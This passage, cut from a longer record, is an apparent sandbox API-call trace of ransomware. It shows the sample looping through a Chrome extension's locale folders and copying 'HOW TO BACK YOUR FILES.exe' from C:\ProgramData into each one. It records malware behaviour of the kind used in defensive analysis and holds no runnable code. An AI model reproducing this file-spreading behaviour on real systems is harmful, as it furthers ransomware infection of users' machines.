ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd0c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd0c980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.979] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.979] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.979] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi" [0104.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.980] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.980] GetLastError () returned 0x0 [0104.980] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.980] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.980] CloseHandle (hObject=0x120) returned 1 [0104.980] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82872580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd0c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd0c980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.980] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.980] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.981] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk" [0104.981] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.981] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.981] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.981] GetLastError () returned 0x0 [0104.982] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.982] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.982] CloseHandle (hObject=0x120) returned 1 [0104.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.982] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8286b050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd32ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd32ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.984] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.984] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.984] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr" [0104.984] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.984] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.985] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.985] GetLastError () returned 0x0 [0104.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.985] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.985] CloseHandle (hObject=0x120) returned 1 [0104.985] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82863b20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd32ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd32ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.985] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.985] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.986] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th" [0104.986] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.986] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.986] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.987] GetLastError () returned 0x0 [0104.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.987] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.987] CloseHandle (hObject=0x120) returned 1 [0104.987] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8284db90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd58c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd58c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.987] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv" [0104.987] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.987] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.988] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.988] GetLastError () returned 0x0 [0104.988] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.988] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.988] CloseHandle (hObject=0x120) returned 1 [0104.989] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.989] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8282b8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd58c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd58c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.989] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.989] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.989] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr" [0104.989] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.989] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.990] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.990] GetLastError () returned 0x0 [0104.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.990] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.990] CloseHandle (hObject=0x120) returned 1 [0104.990] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828095d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd7eda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd7eda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.990] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.990] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.991] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl" [0104.991] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.991] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.991] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.992] GetLastError () returned 0x0 [0104.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.992] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.992] CloseHandle (hObject=0x120) returned 1 [0104.992] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827f5d50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dd7eda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dd7eda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.992] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.992] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.992] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk" [0104.992] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.992] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.993] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.993] GetLastError () returned 0x0 [0104.993] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.993] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.993] CloseHandle (hObject=0x120) returned 1 [0104.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827e4be0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dda4f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dda4f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.994] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User 